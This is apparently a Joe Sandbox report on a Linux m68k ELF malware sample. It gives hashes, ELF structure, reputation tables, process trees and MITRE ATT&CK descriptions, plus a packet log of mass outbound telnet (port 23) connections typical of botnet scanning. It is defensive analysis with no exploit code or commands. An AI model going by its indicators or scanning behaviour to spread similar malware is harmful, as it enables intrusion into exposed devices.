222.147.153.200	unknown	Japan	4713	OCNNTTCommunicationsCorporationJP	false
91.186.75.69	unknown	Norway	56828	NORWEGIANHEALTHNETWORKNO	false
130.221.233.190	unknown	United States	85	AERO-NETUS	false
91.199.162.45	unknown	Germany	42652	DELUNETDE	false
45.214.217.149	unknown	Zambia	37287	ZAIN-ZAMBIAZM	false
8.139.185.129	unknown	Singapore	37963	CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd	false
91.184.212.240	unknown	Cyprus	35432	CABLENET-ASCY	false
168.178.38.143	unknown	United States	11663	SUG-1US	false
36.250.29.152	unknown	China	4837	CHINA169-BACKBONECHINAUNICOMChina169BackboneCN	false
43.240.13.101	unknown	Hong Kong	55933	CLOUDIE-AS-APCloudieLimitedHK	false
45.44.104.175	unknown	Canada	54198	VIANETCA	false
170.122.117.64	unknown	United States	54314	LHA-2-ASNUS	false
8.113.103.123	unknown	United States	3356	LEVEL3US	false
185.24.218.229	unknown	Poland	59491	LIVENET-PL	false
185.154.90.98	unknown	Italy	47406	RLNET-ASIT	false
91.179.103.124	unknown	Belgium	5432	PROXIMUS-ISP-ASBE	false
45.111.37.194	unknown	Egypt	37069	MOBINILEG	false
45.104.148.96	unknown	Egypt	37069	MOBINILEG	false
45.104.148.98	unknown	Egypt	37069	MOBINILEG	false

Runtime Messages

Command:	/tmp/swOGb2sZYt
Exit Code:	0
Exit Code Info:
Killed:	False
Standard Output:	C7C - c
Standard Error:

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
45.44.28.205	Hilix.arm	Get hash	malicious	Browse
185.231.215.248	2S8N5fDSRs	Get hash	malicious	Browse
185.231.215.248	h9a1NEWEeR	Get hash	malicious	Browse
91.30.56.10	QIJ16axero	Get hash	malicious	Browse
41.117.228.133	Hilix.x86	Get hash	malicious	Browse

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
DTAGInternetserviceprovideroperationsDE	ydZLm6GD56	Get hash	malicious	Browse	91.52.65.175
	BitmCvTrdO	Get hash	malicious	Browse	91.26.178.54
	UQnO4DB8Z1	Get hash	malicious	Browse	91.19.165.18
	OhUy3woBmb	Get hash	malicious	Browse	91.18.128.126
	S8G5z3pdHw	Get hash	malicious	Browse	79.225.12.21
	9o6Z1wEokT	Get hash	malicious	Browse	31.241.9.128
	00hZyjOhZA	Get hash	malicious	Browse	46.86.236.185
	mP1pg0ryFA	Get hash	malicious	Browse	37.83.101.87
	a5nulABeSk	Get hash	malicious	Browse	79.255.11.184
	1bL17EUgTk	Get hash	malicious	Browse	217.239.211.87
	032k4JmR0U	Get hash	malicious	Browse	93.194.49.78
	x86	Get hash	malicious	Browse	91.41.111.100
	arm7	Get hash	malicious	Browse	91.52.65.199
	yJOZ3EeESV	Get hash	malicious	Browse	37.84.16.195
	lYmYPlzghQ	Get hash	malicious	Browse	31.248.86.230
	T0uznhDXKw	Get hash	malicious	Browse	31.233.207.188
	apep.arm7	Get hash	malicious	Browse	31.238.72.59
	QtNnZoNz75	Get hash	malicious	Browse	31.225.15.194
	S13B4aCa4E	Get hash	malicious	Browse	31.228.35.224
	gbk4XWulUo	Get hash	malicious	Browse	31.242.82.129
ITNSIPtransitandpeeringinfrastructureMD	i586-20211007-1619	Get hash	malicious	Browse	91.242.108.9
ITNSIPtransitandpeeringinfrastructureMD	Antisocial.x86	Get hash	malicious	Browse	91.242.108.0
WEBWERKS-AS-INWebWerksIndiaPvtLtdIN	Document MT. MTM MANILA V55.docx	Get hash	malicious	Browse	202.148.54.253
	new order 20211029.exe	Get hash	malicious	Browse	206.183.111.188
	SOA.exe	Get hash	malicious	Browse	206.183.111.188
	x86_64	Get hash	malicious	Browse	103.13.111.195
	ppuXvHPso0.dll	Get hash	malicious	Browse	103.233.25.228
	ppuXvHPso0.dll	Get hash	malicious	Browse	103.233.25.228
	93T511Z3h8	Get hash	malicious	Browse	43.241.39.149
	INV.-0456_20210915.xlsm	Get hash	malicious	Browse	103.233.25.228
	2rafsvW3VD.xlsm	Get hash	malicious	Browse	103.233.25.228
	smierrsy.dll	Get hash	malicious	Browse	103.233.25.228
	smierrsy.dll	Get hash	malicious	Browse	103.233.25.228
	INV.-44906589_20210915.xlsm	Get hash	malicious	Browse	103.233.25.228
	INV.-534912_20210915.xlsm	Get hash	malicious	Browse	103.233.25.228
	sbs_iehost.dll	Get hash	malicious	Browse	103.233.25.228
	sbs_iehost.dll	Get hash	malicious	Browse	103.233.25.228
	INV.-54490_20210915.xlsm	Get hash	malicious	Browse	103.233.25.228
	INV.-1381947126_20210915.xlsm	Get hash	malicious	Browse	103.233.25.228
	triage_dropped_file.dll	Get hash	malicious	Browse	103.233.25.228
	triage_dropped_file.dll	Get hash	malicious	Browse	103.233.25.228
	INV.-486898_20210915.xlsm	Get hash	malicious	Browse	103.233.25.228

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General
File type:	ELF 32-bit MSB executable, Motorola m68k, 68020, version 1 (SYSV), statically linked, stripped
Entropy (8bit):	6.313602374819329
TrID:	ELF Executable and Linkable format (generic) (4004/1) 100.00%
File name:	swOGb2sZYt
File size:	67604
MD5:	0d987a045736b3c9164d851d5abf20e7
SHA1:	4c3449d8826b0b8edfaaff4788c762a8c072b759
SHA256:	4704abb6701285007a922928f19ae74cee37103046e762e385a0154c2fd899fd
SHA512:	46ee9472fbffb3c440cb3b1e909f2916d6df631ce587f7beac2c38384066a14ec3a843dc6da6c5189834b07fee032daf149620b72a685f117a044247d6181fde
SSDEEP:	1536:AYZnNjddm5fG6pszzsfsJ3918KOyzwjJqSmR7JrIY:AYZNz4fG6WzzRp9WylSAZ
File Content Preview:	.ELF.......................D...4.........4. ...(.................................. ..........."..."....`..&....... .dt.Q............................NV..a....da....tN^NuNV..J9..&Df>"y..". QJ.g.X.#...".N."y..". QJ.f.A.....J.g.Hy....N.X.......&DN^NuNV..N^NuN

Static ELF Info

ELF header
Class:	ELF32
Data:	2's complement, big endian
Version:	1 (current)
Machine:	MC68000
Version Number:	0x1
Type:	EXEC (Executable file)
OS/ABI:	UNIX - System V
ABI Version:	0
Entry Point Address:	0x80000144
Flags:	0x0
ELF Header Size:	52
Program Header Offset:	52
Program Header Size:	32
Number of Program Headers:	3
Section Header Offset:	67204
Section Header Size:	40
Number of Section Headers:	10
Header String Table Index:	9

Sections

Name	Type	Address	Offset	Size	EntSize	Flags	Flags Description	Align
	NULL	0x0	0x0	0x0	0x0	0x0		0
.init	PROGBITS	0x80000094	0x94	0x14	0x0	0x6	AX	2
.text	PROGBITS	0x800000a8	0xa8	0xe79e	0x0	0x6	AX	4
.fini	PROGBITS	0x8000e846	0xe846	0xe	0x0	0x6	AX	2
.rodata	PROGBITS	0x8000e854	0xe854	0x1a8c	0x0	0x2	A	2
.ctors	PROGBITS	0x800122e4	0x102e4	0x8	0x0	0x3	WA	4
.dtors	PROGBITS	0x800122ec	0x102ec	0x8	0x0	0x3	WA	4
.data	PROGBITS	0x800122f8	0x102f8	0x34c	0x0	0x3	WA	4
.bss	NOBITS	0x80012644	0x10644	0x22ac	0x0	0x3	WA	4
.shstrtab	STRTAB	0x0	0x10644	0x3e	0x0	0x0		1

Program Segments

Type	Offset	Virtual Address	Physical Address	File Size	Memory Size	Entropy	Flags	Flags Description	Align	Section Mappings
LOAD	0x0	0x80000000	0x80000000	0x102e0	0x102e0	4.4356	0x5	R E	0x2000	.init .text .fini .rodata
LOAD	0x102e4	0x800122e4	0x800122e4	0x360	0x260c	1.7129	0x6	RW	0x2000	.ctors .dtors .data .bss
GNU_STACK	0x0	0x0	0x0	0x0	0x0	0.0000	0x6	RW	0x4

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 1, 2021 13:06:18.048126936 CET	42836	443	192.168.2.23	91.189.91.43
Nov 1, 2021 13:06:18.304147959 CET	42516	80	192.168.2.23	109.202.202.202
Nov 1, 2021 13:06:18.311408997 CET	58350	23	192.168.2.23	147.188.30.159
Nov 1, 2021 13:06:18.311480999 CET	58350	23	192.168.2.23	124.240.211.158
Nov 1, 2021 13:06:18.311513901 CET	58350	23	192.168.2.23	139.81.199.5
Nov 1, 2021 13:06:18.311608076 CET	58350	23	192.168.2.23	172.44.129.156
Nov 1, 2021 13:06:18.311628103 CET	58350	23	192.168.2.23	34.109.179.78
Nov 1, 2021 13:06:18.311661959 CET	58350	23	192.168.2.23	209.66.247.197
Nov 1, 2021 13:06:18.311671972 CET	58350	23	192.168.2.23	221.13.21.232
Nov 1, 2021 13:06:18.311691046 CET	58350	23	192.168.2.23	20.132.98.102
Nov 1, 2021 13:06:18.311695099 CET	58350	23	192.168.2.23	201.142.5.64
Nov 1, 2021 13:06:18.311706066 CET	58350	23	192.168.2.23	205.172.121.189
Nov 1, 2021 13:06:18.311712027 CET	58350	23	192.168.2.23	149.24.169.36
Nov 1, 2021 13:06:18.311712980 CET	58350	23	192.168.2.23	2.13.133.181
Nov 1, 2021 13:06:18.311713934 CET	58350	23	192.168.2.23	182.211.75.9
Nov 1, 2021 13:06:18.311716080 CET	58350	23	192.168.2.23	100.42.36.252
Nov 1, 2021 13:06:18.311719894 CET	58350	23	192.168.2.23	204.42.49.31
Nov 1, 2021 13:06:18.311728001 CET	58350	23	192.168.2.23	216.223.10.184
Nov 1, 2021 13:06:18.311739922 CET	58350	23	192.168.2.23	124.231.9.201
Nov 1, 2021 13:06:18.311755896 CET	58350	23	192.168.2.23	63.134.12.8
Nov 1, 2021 13:06:18.311758995 CET	58350	23	192.168.2.23	222.6.60.70
Nov 1, 2021 13:06:18.311777115 CET	58350	23	192.168.2.23	219.137.252.124
Nov 1, 2021 13:06:18.311778069 CET	58350	23	192.168.2.23	72.173.181.142
Nov 1, 2021 13:06:18.311779022 CET	58350	23	192.168.2.23	36.188.193.200
Nov 1, 2021 13:06:18.311779976 CET	58350	23	192.168.2.23	92.182.202.169
Nov 1, 2021 13:06:18.311779022 CET	58350	23	192.168.2.23	185.194.107.102
Nov 1, 2021 13:06:18.311789036 CET	58350	23	192.168.2.23	162.38.118.239
Nov 1, 2021 13:06:18.311793089 CET	58350	23	192.168.2.23	93.127.100.251
Nov 1, 2021 13:06:18.311800003 CET	58350	23	192.168.2.23	163.139.174.213
Nov 1, 2021 13:06:18.311800957 CET	58350	23	192.168.2.23	140.108.86.230
Nov 1, 2021 13:06:18.311806917 CET	58350	23	192.168.2.23	92.139.121.188
Nov 1, 2021 13:06:18.311810970 CET	58350	23	192.168.2.23	76.235.214.28
Nov 1, 2021 13:06:18.311814070 CET	58350	23	192.168.2.23	67.73.37.235
Nov 1, 2021 13:06:18.311820030 CET	58350	23	192.168.2.23	88.69.252.139
Nov 1, 2021 13:06:18.311829090 CET	58350	23	192.168.2.23	204.110.24.104
Nov 1, 2021 13:06:18.311831951 CET	58350	23	192.168.2.23	135.174.171.248
Nov 1, 2021 13:06:18.311852932 CET	58350	23	192.168.2.23	9.107.57.115
Nov 1, 2021 13:06:18.311852932 CET	58350	23	192.168.2.23	189.209.154.168
Nov 1, 2021 13:06:18.311856985 CET	58350	23	192.168.2.23	37.232.215.25
Nov 1, 2021 13:06:18.311865091 CET	58350	23	192.168.2.23	59.35.78.236
Nov 1, 2021 13:06:18.311866999 CET	58350	23	192.168.2.23	94.12.187.208
Nov 1, 2021 13:06:18.311870098 CET	58350	23	192.168.2.23	97.227.104.95
Nov 1, 2021 13:06:18.311871052 CET	58350	23	192.168.2.23	160.164.122.38
Nov 1, 2021 13:06:18.311881065 CET	58350	23	192.168.2.23	85.248.242.167
Nov 1, 2021 13:06:18.311881065 CET	58350	23	192.168.2.23	72.219.136.178
Nov 1, 2021 13:06:18.311882973 CET	58350	23	192.168.2.23	40.0.8.109
Nov 1, 2021 13:06:18.311883926 CET	58350	23	192.168.2.23	125.84.40.148
Nov 1, 2021 13:06:18.311897039 CET	58350	23	192.168.2.23	43.96.203.243
Nov 1, 2021 13:06:18.311901093 CET	58350	23	192.168.2.23	36.177.60.96
Nov 1, 2021 13:06:18.311904907 CET	58350	23	192.168.2.23	2.43.172.163
Nov 1, 2021 13:06:18.311911106 CET	58350	23	192.168.2.23	177.65.50.139
Nov 1, 2021 13:06:18.311913013 CET	58350	23	192.168.2.23	93.42.224.4
Nov 1, 2021 13:06:18.311913967 CET	58350	23	192.168.2.23	145.146.184.128
Nov 1, 2021 13:06:18.311918020 CET	58350	23	192.168.2.23	202.172.42.13
Nov 1, 2021 13:06:18.311918974 CET	58350	23	192.168.2.23	51.108.249.176
Nov 1, 2021 13:06:18.311922073 CET	58350	23	192.168.2.23	103.237.93.51
Nov 1, 2021 13:06:18.311928988 CET	58350	23	192.168.2.23	86.49.125.121
Nov 1, 2021 13:06:18.311929941 CET	58350	23	192.168.2.23	158.122.34.66
Nov 1, 2021 13:06:18.311940908 CET	58350	23	192.168.2.23	144.1.122.44
Nov 1, 2021 13:06:18.311943054 CET	58350	23	192.168.2.23	89.57.84.153
Nov 1, 2021 13:06:18.311959028 CET	58350	23	192.168.2.23	47.105.92.189
Nov 1, 2021 13:06:18.311981916 CET	58350	23	192.168.2.23	73.163.172.167
Nov 1, 2021 13:06:18.312022924 CET	58350	23	192.168.2.23	39.26.53.70
Nov 1, 2021 13:06:18.312067986 CET	58350	23	192.168.2.23	54.43.77.123
Nov 1, 2021 13:06:18.312068939 CET	58350	23	192.168.2.23	100.252.167.94
Nov 1, 2021 13:06:18.312068939 CET	58350	23	192.168.2.23	63.37.112.27
Nov 1, 2021 13:06:18.312072039 CET	58350	23	192.168.2.23	66.162.79.60
Nov 1, 2021 13:06:18.312082052 CET	58350	23	192.168.2.23	51.253.179.240
Nov 1, 2021 13:06:18.312093019 CET	58350	23	192.168.2.23	210.20.130.61
Nov 1, 2021 13:06:18.312097073 CET	58350	23	192.168.2.23	188.100.125.97
Nov 1, 2021 13:06:18.312115908 CET	58350	23	192.168.2.23	101.191.139.13
Nov 1, 2021 13:06:18.312145948 CET	58350	23	192.168.2.23	90.101.255.251
Nov 1, 2021 13:06:18.312156916 CET	58350	23	192.168.2.23	141.77.229.48
Nov 1, 2021 13:06:18.312165976 CET	58350	23	192.168.2.23	149.236.199.44
Nov 1, 2021 13:06:18.312170982 CET	58350	23	192.168.2.23	99.100.138.102
Nov 1, 2021 13:06:18.312197924 CET	58350	23	192.168.2.23	126.172.182.117
Nov 1, 2021 13:06:18.312201023 CET	58350	23	192.168.2.23	88.166.205.56
Nov 1, 2021 13:06:18.312201023 CET	58350	23	192.168.2.23	35.171.182.173
Nov 1, 2021 13:06:18.312215090 CET	58350	23	192.168.2.23	17.81.129.103
Nov 1, 2021 13:06:18.312215090 CET	58350	23	192.168.2.23	76.34.7.161
Nov 1, 2021 13:06:18.312220097 CET	58350	23	192.168.2.23	126.22.39.233
Nov 1, 2021 13:06:18.312226057 CET	58350	23	192.168.2.23	204.138.119.220
Nov 1, 2021 13:06:18.312228918 CET	58350	23	192.168.2.23	80.25.28.15
Nov 1, 2021 13:06:18.312227964 CET	58350	23	192.168.2.23	110.0.115.116
Nov 1, 2021 13:06:18.312230110 CET	58350	23	192.168.2.23	135.126.223.28
Nov 1, 2021 13:06:18.312232018 CET	58350	23	192.168.2.23	176.243.158.49
Nov 1, 2021 13:06:18.312235117 CET	58350	23	192.168.2.23	175.0.87.181
Nov 1, 2021 13:06:18.312242985 CET	58350	23	192.168.2.23	104.64.50.114
Nov 1, 2021 13:06:18.312247038 CET	58350	23	192.168.2.23	136.113.195.224
Nov 1, 2021 13:06:18.312247992 CET	58350	23	192.168.2.23	149.173.159.122
Nov 1, 2021 13:06:18.312263012 CET	58350	23	192.168.2.23	179.5.186.247
Nov 1, 2021 13:06:18.312264919 CET	58350	23	192.168.2.23	19.71.139.196
Nov 1, 2021 13:06:18.312267065 CET	58350	23	192.168.2.23	200.65.80.205
Nov 1, 2021 13:06:18.312268972 CET	58350	23	192.168.2.23	19.195.213.32
Nov 1, 2021 13:06:18.312268972 CET	58350	23	192.168.2.23	12.238.61.114
Nov 1, 2021 13:06:18.312274933 CET	58350	23	192.168.2.23	210.255.4.59
Nov 1, 2021 13:06:18.312283993 CET	58350	23	192.168.2.23	123.231.128.158
Nov 1, 2021 13:06:18.312299967 CET	58350	23	192.168.2.23	76.63.197.228
Nov 1, 2021 13:06:18.312304020 CET	58350	23	192.168.2.23	196.209.229.147
Nov 1, 2021 13:06:18.312318087 CET	58350	23	192.168.2.23	154.49.94.135

HTTP Request Dependency Graph

127.0.0.1:52869

System Behavior

Analysis Process: swOGb2sZYt PID: 5245 Parent PID: 5118

General

Start time:	13:06:17
Start date:	01/11/2021
Path:	/tmp/swOGb2sZYt
Arguments:	/tmp/swOGb2sZYt
File size:	4463432 bytes
MD5 hash:	cd177594338c77b895ae27c33f8f86cc

Analysis Process: swOGb2sZYt PID: 5247 Parent PID: 5245

General

Start time:	13:06:17
Start date:	01/11/2021
Path:	/tmp/swOGb2sZYt
Arguments:	n/a
File size:	4463432 bytes
MD5 hash:	cd177594338c77b895ae27c33f8f86cc

Analysis Process: swOGb2sZYt PID: 5267 Parent PID: 5247

General

Start time:	13:06:22
Start date:	01/11/2021
Path:	/tmp/swOGb2sZYt
Arguments:	n/a
File size:	4463432 bytes
MD5 hash:	cd177594338c77b895ae27c33f8f86cc

Analysis Process: swOGb2sZYt PID: 5269 Parent PID: 5247

General

Start time:	13:06:22
Start date:	01/11/2021
Path:	/tmp/swOGb2sZYt
Arguments:	n/a
File size:	4463432 bytes
MD5 hash:	cd177594338c77b895ae27c33f8f86cc

Analysis Process: swOGb2sZYt PID: 5271 Parent PID: 5269

General

Start time:	13:06:22
Start date:	01/11/2021
Path:	/tmp/swOGb2sZYt
Arguments:	n/a
File size:	4463432 bytes
MD5 hash:	cd177594338c77b895ae27c33f8f86cc

Analysis Process: swOGb2sZYt PID: 5291 Parent PID: 5271

General

Start time:	13:06:27
Start date:	01/11/2021
Path:	/tmp/swOGb2sZYt
Arguments:	n/a
File size:	4463432 bytes
MD5 hash:	cd177594338c77b895ae27c33f8f86cc

Analysis Process: swOGb2sZYt PID: 5292 Parent PID: 5271

General

Start time:	13:06:27
Start date:	01/11/2021
Path:	/tmp/swOGb2sZYt
Arguments:	n/a
File size:	4463432 bytes
MD5 hash:	cd177594338c77b895ae27c33f8f86cc

Analysis Process: swOGb2sZYt PID: 5295 Parent PID: 5271

General

Start time:	13:06:27
Start date:	01/11/2021
Path:	/tmp/swOGb2sZYt
Arguments:	n/a
File size:	4463432 bytes
MD5 hash:	cd177594338c77b895ae27c33f8f86cc

Analysis Process: swOGb2sZYt PID: 5296 Parent PID: 5271

General

Start time:	13:06:27
Start date:	01/11/2021
Path:	/tmp/swOGb2sZYt
Arguments:	n/a
File size:	4463432 bytes
MD5 hash:	cd177594338c77b895ae27c33f8f86cc

Analysis Process: swOGb2sZYt PID: 5273 Parent PID: 5269

General

Start time:	13:06:22
Start date:	01/11/2021
Path:	/tmp/swOGb2sZYt
Arguments:	n/a
File size:	4463432 bytes
MD5 hash:	cd177594338c77b895ae27c33f8f86cc

Analysis Process: swOGb2sZYt PID: 5275 Parent PID: 5269

General

Start time:	13:06:22
Start date:	01/11/2021
Path:	/tmp/swOGb2sZYt
Arguments:	n/a
File size:	4463432 bytes
MD5 hash:	cd177594338c77b895ae27c33f8f86cc

Analysis Process: swOGb2sZYt PID: 5280 Parent PID: 5269

General

Start time:	13:06:22
Start date:	01/11/2021
Path:	/tmp/swOGb2sZYt
Arguments:	n/a
File size:	4463432 bytes
MD5 hash:	cd177594338c77b895ae27c33f8f86cc

Analysis Process: swOGb2sZYt PID: 5284 Parent PID: 5269

General

Start time:	13:06:22
Start date:	01/11/2021
Path:	/tmp/swOGb2sZYt
Arguments:	n/a
File size:	4463432 bytes
MD5 hash:	cd177594338c77b895ae27c33f8f86cc

Analysis Process: swOGb2sZYt PID: 5248 Parent PID: 5245

General

Start time:	13:06:17
Start date:	01/11/2021
Path:	/tmp/swOGb2sZYt
Arguments:	n/a
File size:	4463432 bytes
MD5 hash:	cd177594338c77b895ae27c33f8f86cc

Analysis Process: swOGb2sZYt PID: 5249 Parent PID: 5245

General

Start time:	13:06:17
Start date:	01/11/2021
Path:	/tmp/swOGb2sZYt
Arguments:	n/a
File size:	4463432 bytes
MD5 hash:	cd177594338c77b895ae27c33f8f86cc

Analysis Process: swOGb2sZYt PID: 5253 Parent PID: 5249

General

Start time:	13:06:17
Start date:	01/11/2021
Path:	/tmp/swOGb2sZYt
Arguments:	n/a
File size:	4463432 bytes
MD5 hash:	cd177594338c77b895ae27c33f8f86cc

Analysis Process: swOGb2sZYt PID: 5276 Parent PID: 5253

General

Start time:	13:06:22
Start date:	01/11/2021
Path:	/tmp/swOGb2sZYt
Arguments:	n/a
File size:	4463432 bytes
MD5 hash:	cd177594338c77b895ae27c33f8f86cc

Analysis Process: swOGb2sZYt PID: 5278 Parent PID: 5253

General

Start time:	13:06:22
Start date:	01/11/2021
Path:	/tmp/swOGb2sZYt
Arguments:	n/a
File size:	4463432 bytes
MD5 hash:	cd177594338c77b895ae27c33f8f86cc

Analysis Process: swOGb2sZYt PID: 5281 Parent PID: 5253

General

Start time:	13:06:22
Start date:	01/11/2021
Path:	/tmp/swOGb2sZYt
Arguments:	n/a
File size:	4463432 bytes
MD5 hash:	cd177594338c77b895ae27c33f8f86cc

Analysis Process: swOGb2sZYt PID: 5283 Parent PID: 5253

General

Start time:	13:06:22
Start date:	01/11/2021
Path:	/tmp/swOGb2sZYt
Arguments:	n/a
File size:	4463432 bytes
MD5 hash:	cd177594338c77b895ae27c33f8f86cc

Analysis Process: swOGb2sZYt PID: 5254 Parent PID: 5249

General

Start time:	13:06:17
Start date:	01/11/2021
Path:	/tmp/swOGb2sZYt
Arguments:	n/a
File size:	4463432 bytes
MD5 hash:	cd177594338c77b895ae27c33f8f86cc

Analysis Process: swOGb2sZYt PID: 5256 Parent PID: 5249

General

Start time:	13:06:17
Start date:	01/11/2021
Path:	/tmp/swOGb2sZYt
Arguments:	n/a
File size:	4463432 bytes
MD5 hash:	cd177594338c77b895ae27c33f8f86cc

Analysis Process: swOGb2sZYt PID: 5259 Parent PID: 5249

General

Start time:	13:06:17
Start date:	01/11/2021
Path:	/tmp/swOGb2sZYt
Arguments:	n/a
File size:	4463432 bytes
MD5 hash:	cd177594338c77b895ae27c33f8f86cc

Analysis Process: swOGb2sZYt PID: 5263 Parent PID: 5249

General

Start time:	13:06:17
Start date:	01/11/2021
Path:	/tmp/swOGb2sZYt
Arguments:	n/a
File size:	4463432 bytes
MD5 hash:	cd177594338c77b895ae27c33f8f86cc

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Linux Analysis Report swOGb2sZYt

Overview

General Information

Detection

Signatures

Classification

Analysis Advice

General Information

Process Tree

Yara Overview

Initial Sample

PCAP (Network Traffic)

Memory Dumps

Jbx Signature Overview

AV Detection:

Networking:

System Summary:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Malware Configuration

Behavior Graph

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Runtime Messages

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

Static ELF Info

ELF header

Sections

Program Segments

Network Behavior

Network Port Distribution

TCP Packets

HTTP Request Dependency Graph

System Behavior

Analysis Process: swOGb2sZYt PID: 5245 Parent PID: 5118

General

Analysis Process: swOGb2sZYt PID: 5247 Parent PID: 5245

General

Analysis Process: swOGb2sZYt PID: 5267 Parent PID: 5247

General

Analysis Process: swOGb2sZYt PID: 5269 Parent PID: 5247

General

Analysis Process: swOGb2sZYt PID: 5271 Parent PID: 5269

General

Analysis Process: swOGb2sZYt PID: 5291 Parent PID: 5271

General

Analysis Process: swOGb2sZYt PID: 5292 Parent PID: 5271

General

Analysis Process: swOGb2sZYt PID: 5295 Parent PID: 5271

General

Analysis Process: swOGb2sZYt PID: 5296 Parent PID: 5271

General

Analysis Process: swOGb2sZYt PID: 5273 Parent PID: 5269